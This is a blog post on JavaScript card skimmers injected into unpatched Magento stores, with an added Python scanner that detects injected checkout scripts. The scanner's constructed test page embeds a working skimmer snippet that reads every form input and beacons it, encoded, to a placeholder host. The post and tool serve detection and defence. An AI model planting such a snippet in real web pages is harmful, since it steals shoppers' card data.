You’ve probably heard about credit card skimmers that criminals attach to gas pumps, ATMs and self-checkout terminals at grocery stores to copy your card data off the magnetic stripe.
As more stores move to chip (EMV) cards, data copied off the stripe no longer lets a criminal use that card in the physical world, so the criminals have adapted and moved the skimmer into the virtual world. And, not surprisingly, online merchants are in the same state of denial that physical merchants were in until the wakeup calls arrived from the likes of Target, Home Depot and Wendy’s.
So what are they doing? I’m glad you asked!
They are installing virtual skimmers on hackable web sites. A virtual skimmer is a piece of JavaScript that the attacker injects into the checkout page; it sits between the shopper and the payment processor and copies the card details as they are typed into the form.
This technique only works if the web site itself can be compromised so that the attacker can modify the checkout page.
This particular campaign targets the Magento ecommerce platform that many sites are built on top of. Sites that never install patches, or do not install them promptly, are the easy targets: if the attackers find the site before the patches go in, they can add their skimmer to it. It is highly unlikely that those sites will notice the modification because, as with a physical skimmer, the checkout still completes normally. The skimmer sends a copy of the card data to a collection server (in this campaign, in China, Russia or Ukraine) and the order goes through to the credit card processor as usual. The site gets its money, the customer gets their goods, and the attacker gets the card data.
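Because the skimmer is just another script on a page the server legitimately serves, the most useful check a store owner can run is to look at what scripts the checkout page actually loads and what the inline ones do. The scanner below is an added illustrative example, not code from the original post, from the researcher mentioned later, or from Magento. It assumes a per-store allowlist of hosts that may serve scripts (the hosts here are placeholders), and it uses simple regular-expression heuristics for "reads form fields and ships them somewhere". The two sample pages are constructed for the demo; the second contains a minimal form-read-and-beacon script of the kind the post describes.

```python
"""Scan a checkout page for injected skimmer scripts (added example, stdlib only)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads scripts from. Assumption for the demo:
# a real store builds this from its own theme and payment integration.
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "js.example-payments.com"}

# Heuristics: a skimmer reads input fields (or hooks the submit) AND sends data
# out. Either half alone is normal checkout code; flag only the combination.
READS_FORM = re.compile(r"(querySelector(All)?\s*\(|getElementById\s*\(|\.value\b)")
HOOKS_SUBMIT = re.compile(r"(addEventListener\s*\(\s*['\"](submit|click)|\.onsubmit\s*=)")
SENDS_DATA = re.compile(
    r"(new\s+Image\s*\(|XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|\.src\s*=\s*['\"]https?://)"
)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings; an empty list means nothing suspicious."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname       # None for same-origin paths like /js/app.js
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        if SENDS_DATA.search(body) and (READS_FORM.search(body) or HOOKS_SUBMIT.search(body)):
            findings.append(("inline-exfil", body.strip()[:80]))
    return findings


# Constructed sample pages for the demo (not captured from any real store).
CLEAN_PAGE = """<html><body>
<form id="checkout" action="/checkout/submit" method="post">
<input name="cc_number"><input name="cc_cvv"></form>
<script src="/js/theme.js"></script>
<script src="https://js.example-payments.com/v1/pay.js"></script>
<script>document.getElementById('checkout').addEventListener('submit', function(){ console.log('order placed'); });</script>
</body></html>"""

# Same page with an injected third-party library and a form-read-and-beacon script.
SKIMMED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="https://cdn-stats.example.net/jquery.min.js"></script>
<script>document.getElementById('checkout').addEventListener('submit', function(){
  var d = '';
  document.querySelectorAll('input').forEach(function(i){ d += i.name + '=' + i.value + '&'; });
  new Image().src = 'https://cdn-stats.example.net/log.gif?' + btoa(d);
});</script>
</body>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("skimmed", SKIMMED_PAGE)):
        print(name, scan_checkout_page(page))
```

The allowlist catches the common case of a skimmer pulled in from an attacker-controlled host; the inline heuristic catches the one pasted directly into the template. Neither replaces file integrity monitoring on the web root, but both run against the page as a shopper sees it, which is the only place HTTPS and a security seal will never help you.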
So far, a Dutch researcher has found the virtual skimmer software on about 6,000 online stores, and he says the number is growing at roughly 85 new stores every day. The good news (for the attacker) is that these are mostly small stores that are very unlikely to figure out they have been hacked unless the FBI comes to visit them. That is unlikely to happen because the FBI is busy with the likes of Vera Bradley.
What this means is that these sites will keep feeding card data to the attackers until the banks trace the fraud back to them, cancel their merchant account and sue them. At that point the site goes out of business, because most of them are too small to carry cyber insurance. Going out of business may or may not make the lawsuit go away, so for at least some of these sites the bank will get a default judgement, leaving the owner to pay the bank or file for bankruptcy protection. Not a pretty picture, to be honest.
So who are these sites that have a virtual skimmer installed?
One is the Republican Senatorial Committee’s online store.
When The Register asked the Republican Senatorial Committee whether they had secured their web site and whether customers visiting it were safe from the skimmer, they got the silent treatment. My suggestion would be to not provide your credit card to any Republican web site until there is a positive statement from them that the problem is fixed and that using your card there is safe again. Obviously it is embarrassing, especially during an election cycle, to tell donors that you have been hacked. The researcher said that he told the Republicans about the problem and they did not respond to him either, but that the script was subsequently removed.
The researcher said that as far as he can tell this campaign has been running since May of last year, but unlike the attack on Vera Bradley, stopping it would require getting tens of thousands of web sites to patch their software and, in most cases, hire someone to remove the malware. These site owners are small businesses, for the most part, and do not have the skills to do it themselves.
Some of the sites the researcher contacted replied “thanks, but we are safe, no worries”, or “we are safe because we use https”, or “we are safe because we have the Symantec security seal”. Neither helps: the skimmer is part of the page the server itself delivers, so HTTPS just encrypts the malicious script along with everything else, and a seal is a static badge that never looks at the checkout code. That is the denial I was talking about earlier.
The researcher has discovered 9 variations of the scripts. Does that mean 9 hacking organizations are using this technique or just that the developer has a commitment to continuous improvement and is iterating the technology?
What is likely to occur, now that the media is reporting this, is for other hackers to figure out how to replicate this and find other unpatched web sites that can be infected, whether they are running Magento or something else.
eCommerce web sites should pay attention to this, because they may be held liable by the credit card companies and have to foot the bill for the fraud. And, of course, they need to install patches promptly so that attackers do not get a window to exploit a known bug before the fix is in.
For customers, watch your statements, but even more important, turn on the per-transaction text alerts that almost all banks offer. If everyone did that, stolen card numbers would be good for at most one fraudulent transaction before being reported and cancelled, which is a pretty slim payday and would take most of the profit out of the card theft business.
Information for this post came from The Register.